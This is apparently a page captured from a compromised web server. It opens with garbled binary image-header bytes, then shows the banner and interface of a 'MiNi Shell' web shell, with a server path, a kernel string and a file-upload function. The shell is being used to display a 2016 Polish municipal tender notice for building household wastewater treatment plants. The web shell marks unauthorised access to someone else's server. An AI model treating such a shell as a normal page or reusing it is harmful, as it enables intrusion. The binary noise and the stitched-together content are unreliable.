JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160516/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160516/123128-N-2016.html

<p class="kh_header"><b>Grabów nad Pilicą: Budowa oczyszczalni przydomowych w miejscowościach Cychrowska 
Wola, Lipinki, Celinów, Dziecinów, Edwardów, Łękawica, Paprotnia, Zwierzyniec, 
Koziołek, Nowa Wola, Strzyżyna i Budy Augustowskie</b><br>
<b>Numer ogłoszenia: 123128 - 2016; data zamieszczenia: 16.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Grabów nad Pilicą , ul. Kazimierza Pułaskiego 51, 26-902 Grabów nad Pilicą, woj. mazowieckie, tel. 48 662 70 14, faks 48 662 60 52.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.grabow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa oczyszczalni przydomowych w miejscowościach Cychrowska 
Wola, Lipinki, Celinów, Dziecinów, Edwardów, Łękawica, Paprotnia, Zwierzyniec, 
Koziołek, Nowa Wola, Strzyżyna i Budy Augustowskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są :
1	Roboty budowlane, w rozumieniu art. 3 pkt.7 Ustawy z dnia 7 lipca 1994r. Prawo budowlane polegające na wybudowaniu 100 biologicznych oczyszczalni ścieków PBOŚ przy gospodarstwach indywidualnych oraz budynkach użyteczności publicznej (wyposażeniu nieruchomości)  w Gminie Grabów nad Pilicą wg zestawienia podanego w specyfikacji .
2	PBOŚ - należy przez to rozumieć Przydomowe Biologiczne Oczyszczalnie Ścieków, w treści SIWZ zwane również w skrócie oczyszczalnią, zbiornikiem lub zespołem urządzeń. Przydomowa biologiczna oczyszczalnia ścieków PBOŚ to urządzenie lub zespół urządzeń, w których na drodze procesów mechanicznych, biologicznych i chemicznych następuje redukcja ładunku zanieczyszczeń w ściekach do wielkości dopuszczalnych określonych w Rozporządzeniu MŚ z dnia 18 listopada 2014r w sprawie warunków, jakie należy spełnić przy wprowadzaniu ścieków do wód lub do ziemi, oraz w sprawie substancji szczególnie szkodliwych dla środowiska wodnego Dz.U. z dnia 16 grudnia 2014r. poz. 1800 jak dla oczyszczani poniżej 2000 RLM. wg Załącznika Nr 1 do ww. aktu wykonawczego.  
3)	Zamawiający dopuszcza możliwość zastosowania równoważnych zamiennych do widniejących w projektach sposobów odprowadzania oczyszczonych ścieków lecz muszą  one być oparte na systemach rozsączenia w gruncie.
4	Dokonanie  rozruchu technologicznego każdej oczyszczalni, indywidualne  przeszkolenie  użytkowników w zakresie obsługi urządzeń i instalacji oczyszczalni,  a także  przekazanie  im instrukcji obsługi DTR oraz wykonanie badań oczyszczonych ścieków przez akredytowane laboratorium, w ilościach 5% zamontowanych oczyszczalni wymagane jest wykonanie uproszczonych tj. wyłącznie badanie ścieków oczyszczonych
Niezwłocznie po otrzymaniu wyników badań ścieków z laboratorium należy je dostarczyć Zamawiającemu.
5	Uporządkowanie placu budowy do stanu pierwotnego wywóz nadmiaru gruntu, niwelacja terenu.
6 Protokolarne przekazanie  wykonanych   oczyszczalni władającym  nieruchomościami objętymi inwestycją (wszystkie formularze należy uzgodnić z Zamawiającym). 
7	Obsługa geodezyjna inwestycji.
8	Obsługa w zakresie sporządzania badań i pomiarów przeprowadzonych przez uprawnione osoby  lub podmioty,  niezbędnych do odbioru urządzenia instalacji  w tym badania instalacji elektrycznej;
9	Inwentaryzacja geodezyjna -  powykonawcza obiektów w 2 egz. .
10	Sporządzenie  i przedłożenie  dokumentacji odbiorowej  powykonawczej  w 2 egz..
11	Jako oczyszczalnie  Zamawiający rozumie kompletny  zespół urządzeń wraz   z infrastrukturą zasilanie  energetyczne, sieć kanalizacyjna i inne- wg projektów  niezbędnych  do odbioru ścieków   z budynku, oczyszczenia, odprowadzenia w określony sposób, opartych na indywidualnych przydomowych oczyszczalniach  ścieków zgodnych z indywidualnie wykonanymi   projektami.
12	Zamawiający wymaga kompletu raportów  z badań potwierdzających zgodność produktu z normą PN-EN 12566-3+A2:2013 wykonanych przez laboratorium notyfikowane przez Komisję Europejską tj. raportów w zakresie wodoszczelności, skuteczności oczyszczania, wytrzymałości konstrukcyjnej dla warunków gruntowych wilgotnych, trwałości) wykonanych zgodnie z treścią normy PN-EN 12566-3+A2:2013. 
13	Ponadto raport dotyczący skuteczności oczyszczania  musi odnosić się do wskaźników energochłonności oraz oczekiwanego stopnia oczyszczenia ścieków. Posiadanie w/w dokumentu jednoznaczne jest z możliwością oznakowania wyrobu znakiem CE. Zamawiający nie dopuszcza PBOŚ, które producent zmienił konstrukcyjnie względem PBOŚ jakie były badane przez laboratorium notyfikowane - Zamawiający wymaga oczyszczalni zbadanych zgodnie   z zapisami normy PN-EN 12566-3+A2:2013.
14	Zamawiający wymaga załączenia do oferty dokumentu raportu określającego reakcje na ogień Rozdział 8.2 tablica 2 poz. 6 normy 12566-3:2005+A2:2013.
15	Zamawiający wymaga przedłożenia do oferty  dokumentów, na podstawie których Producent oznakował oczyszczalnie znakiem CE zgodnie z wymogiem określonym w tablicy ZA 1 normy 12566-3:2005+A2:2013.
16	Zamawiający wymaga aby oczyszczalnie zostały przebadane przez laboratorium notyfikowane oraz inne podmioty zgodnie z Tabelą ZA.3 normy  PN-EN 12566-3+A2:2013 w zgodnie z treścią normy PN-EN 12566-3+A2:2013 w całości jako kompletne rozwiązanie. Dostarczane urządzenia mają być kompletnymi, fabrycznie nowymi produktami.
17	W Raporcie dotyczącym skuteczności oczyszczania należy wskazać zaznaczyć  dobową energochłonność  urządzenia opis w formularzu ofertowym .  Raport dotyczący skuteczności oczyszczania  musi zawierać elementy wskazane w punkcie B.5 normy PN-EN 12566-3+A2:2013       
18	Zamawiający wymaga aby zamienne urządzenia były równoważne lub lepsze od urządzeń widniejących w projektach załącznik do SIWZ. 
Za urządzenia bądź materiały równoważne Zamawiający uzna takie urządzenia i materiały, które posiadają takie same lub korzystniejsze parametry techniczne i jakościowe opisane w SIWZ, a ich zastosowanie w żaden sposób nie wpłynie na prawidłowe funkcjonowanie rozwiązań techniczno - technologicznych przewidzianych w dokumentacji projektowej.
Równoważne produkty i urządzenia muszą posiadać wszelkie wymagane w SIWZ oraz prawem certyfikaty dopuszczające je do obrotu  i stosowania.  Zamawiający nie wyraża zgody, by proponowane w ofercie rozwiązania, urządzenia, równoważne były prototypami. Równoważność lub wykazanie lepszych parametrów  oferowanych oczyszczalni w niniejszym postępowaniu będzie oceniana na podstawie spełniania przez te urządzania normy PN-EN 12566-3+A2:2013 legitymowanie się kompletem raportów z zakresu normy PN-EN 12566-3+A2:2013, i pracy nie wymagającej zużycia energii elektrycznej potwierdzonej treścią raportu skuteczności oczyszczania, a także na podstawie zgodności parametrów takich jak przeznaczenie oczyszczalni dla wskazanej w projektach ilości osób RLM, oraz przepustowości  dobowej. 
19	W przypadku oferowania zastosowania  rozwiązań równoważnych lub lepszych  Wykonawca do oferty dołączy wykaz oczyszczalni dokument Wykonawcy zawierający potwierdzenie równoważności urządzeń lub oferowania  urządzeń lepszych .
W/w dokument wykaz  będzie obejmował informacje w zakresie przewidywanych  zmian związanych z zastosowaniem urządzeń równoważnych lub lepszych tj. zmian  w planie zagospodarowania stanowiących załączniki do projektów umiejscowienie na działce, powierzchnia  zabudowy elementów  urządzeń, odległości od budynków, granic, studni itp. wynikających  z przepisów prawa budowlanego i warunków technicznych. W przypadku zmian warunków technicznych Wykonawca na swój koszt wykona aktualizację/zmianę projektu i uzyska wszystkie stosowne zezwolenia na wykonanie robót budowlanych.
20	Podane w SIWZ, oraz we wszystkich dokumentach stanowiących załączniki do specyfikacji istotnych warunków zamówienia szczegółowe określenie przedmiotu zamówienia poprzez np. wskazanie konkretnego produktu, urządzenia lub materiału poprzez podanie jego nazwy lub nazwy producenta lub konkretnego rozwiązania mają jedynie na celu doprecyzowanie przedmiotu zamówienia i nie ograniczają konkurencji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 6 ustawy dotychczasowemu Wykonawcy robót budowlanych w okresie 3 lat od udzielenia zamówienia podstawowego, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.24.21-9, 45.23.13.00-8, 45.25.21.27-4, 45.26.26.40-9, 45.11.12.00-0, 45.31.00.00-3, 45.23.11.10-9, 45.23.24.10-9, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Zamawiający wymaga wniesienia wadium w wysokości:
40 000 zł. (czterdzieści tysięcy złotych)
w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju   Przedsiębiorczości. 
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego Nr 30 9125 1015 0007 6454 2000 0150  z opisem : WADIUM -
Budowa oczyszczalni przydomowych w miejscowościach Cychrowska Wola, Lipinki, 
Celinów, Dziecinów, Edwardów, Łękawica, Paprotnia, Zwierzyniec, Koziołek, Nowa Wola, 
Strzyżyna i Budy Augustowskie.
2.	Do oferty należy  dołączyć oryginał lub kserokopię przelewu potwierdzoną za zgodność z oryginałem. 
3.	O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono w wyznaczonym terminie decyduje data i godzina wpływu środków na rachunek Zamawiającego. Wadium musi znajdować się na koncie Zamawiającego w terminie składania ofert.
4.	W przypadku wniesienia wadium w pozostałych dopuszczalnych formach, określonych w ust.1, do oferty należy dołączyć oryginał dokumentu potwierdzający wniesienie wadium ( bez wpinania do oferty). Zaleca się dołączyć do oferty kserokopię dokumentu, o którym mowa powyżej, poświadczoną za zgodność z oryginałem przez Wykonawcę. Zamawiający zwracając wadium w trybie art. 46 ustawy Prawo zamówień publicznych zwróci Wykonawcy oryginał dokumentu wadium a w dokumentacji przetargowej zostanie poświadczona za zgodność z oryginałem kserokopia zwróconego dokumentu. Wykonawca zostanie wykluczony z niniejszego postępowania a jego oferta zostanie odrzucona, jeżeli jego oferta przed upływem terminu składania ofert nie zostanie zabezpieczona wadium w wymaganej wysokości lub  wybranej formie spośród możliwych wymienionych w ust.1.
5.	Wadium winno obejmować cały okres związania ofertą. 
6.	Zamawiający przechowa a następnie dokona zwrotu lub zatrzyma wadium zgodnie z warunkami określonymi w art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże , że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 roboty budowlane polegające na montażu przydomowych oczyszczalni ścieków w liczbie nie mniejszej niż 100 sztuk każda z robót potwierdzone dokumentami , że roboty zostały wykonane w sposób należyty oraz wskazującymi, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w zakresie dysponowania odpowiednim potencjałem technicznym na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w zakresie dysponowania odpowiednim potencjałem technicznym na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w zakresie dysponowania odpowiednim potencjałem technicznym na podstawie złożonego przez Wykonawcę wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1	oświadczenie o zastosowaniu oczyszczalni ścieków legitymujących się dokumentem potwierdzającym zgodność z normą PN-EN 12566-3+A2:2013 wydanym przez laboratorium notyfikowane przez Komisję Europejską w zakresie badań przewidzianych dla laboratorium notyfikowanego - załącznik Nr 8 
2	wydaną przez producenta Deklarację Właściwości Użytkowych dla oferowanych przydomowych biologicznych oczyszczalni ścieków- Załącznik Wykonawcy; 
3	Instrukcja obsługi - Załącznik Wykonawcy;
4	Dokumenty , na podstawie których Producent oznakował oczyszczalnie znakiem CE zgodnie z wymogiem określonym w tablicy ZA 1 normy 12566-3:2005+A2:2013 - Załącznik Wykonawcy;
5	Komplet  raportów z  badań PBOŚ, potwierdzający zgodność produktu z normą 12566-3+A2:2013, wystawiony przez laboratorium notyfikowane przez Komisję Europejską, wydawany dla konkretnego typoszeregu urządzeń wraz z wskazaniem dobowej energochłonności  urządzenia, tj. 
-raport z badania wodoszczelności wszystkich oferowanych oczyszczalni, w tym zakresie Zamawiający wymaga dostarczenia raportu wodoszczelności dla oczyszczalni, wykonanego przez laboratorium notyfikowane zgodnie z załącznikiem A normy PN EN 12566-3+A2:2013, a w szczególności tablicą A.1 przedmiotowej normy; 
-raport z badania skuteczności oczyszczania, wykonanego przez laboratorium notyfikowane, zawierający wszystkie elementy wymienione w punkcie B.5 normy PN EN 12566-3+A2:2013, a w szczególności - energochłonności zgodnie z treścią normy określoną w punkcie B.5 litera e oraz rozdziale 6.7 tejże normy,  
-raport wytrzymałości konstrukcyjnej dla oferowanych oczyszczalni, dla założonych przez Zamawiającego warunków gruntowych wilgotnych; w tym zakresie Zamawiający wymaga dostarczenia raportu z badania wytrzymałości konstrukcyjnej wykonanej przez laboratorium notyfikowane zgodnie z załącznikiem C tabela C.1, wg metody C.6 normy PN EN 12566-3+A2:2013 dla warunków gruntowych wilgotnych;  
-raport trwałości materiału, wykonany przez laboratorium notyfikowane i potwierdzający parametry materiału określone w rozdziale 6.5 normy PN EN 12566-3+A2:2013 
-raport odporności na ogień, wykonany przez laboratorium notyfikowane zgodnie z normą PN EN 12566-3+A2:2013, 
6	wykaz typów PBOŚ w ramach typoszeregu, dla którego sporządzono pełny raport badań PBOŚ j w;
7	Opis w postaci DTR Producenta, rysunki, schematy,  fotografie proponowanych do zastosowania przydomowych biologicznych oczyszczalni ścieków zawierające w szczególności schemat technologii obiegu ścieków oraz opis elementów oczyszczalni- Załącznik Wykonawcy;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Przedłużony okres gwarancji na kompletne urządzenie - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
